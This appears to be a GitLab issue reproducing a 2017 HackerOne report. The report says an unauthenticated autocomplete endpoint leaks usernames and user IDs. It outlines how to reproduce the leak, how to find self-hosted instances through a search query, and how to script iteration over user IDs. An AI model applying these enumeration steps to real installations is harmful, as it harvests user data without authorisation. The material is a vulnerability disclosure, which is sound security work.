HackerOne reported issue: /autocomplete/users.json can be used to enumerate users without authenticating
I've verified this finding. An attacker can walk all usernames without having an account.
Title: Backend endpoint can be used to perform User ID and Username enumeration of gitlab.com (and self-hosted gitlab installations)
Weakness: Information Disclosure
Date: 2017-05-04 11:06:40 +0000
The endpoint (
/autocomplete/users.json) can be accessed without a valid login and allows userids and usernames to be enumerated.
To replicate the attack:
- Open Chrome in incognito mode.
The user ids and usernames can be enumerated through the parameter
This vulnerability can be leveraged to identify userids and usernames of self-hosted installations of gitlab users. An example of an attack would be:
- Search for
Sign in gitlabusing Google Search. This would return a list of public accessible self-hosted installations of gitlab.
- Attempt the vulnerable endpoint on the returned sites.
This issue is observed in our self-hosted installation of Gitlab CE v9.1.2.
2017-05-04 11:12:20 +0000: @evelynleems (comment)
Just to add on, a script can be created to iterate the
author_id to obtain the list of userids and usernames on the system.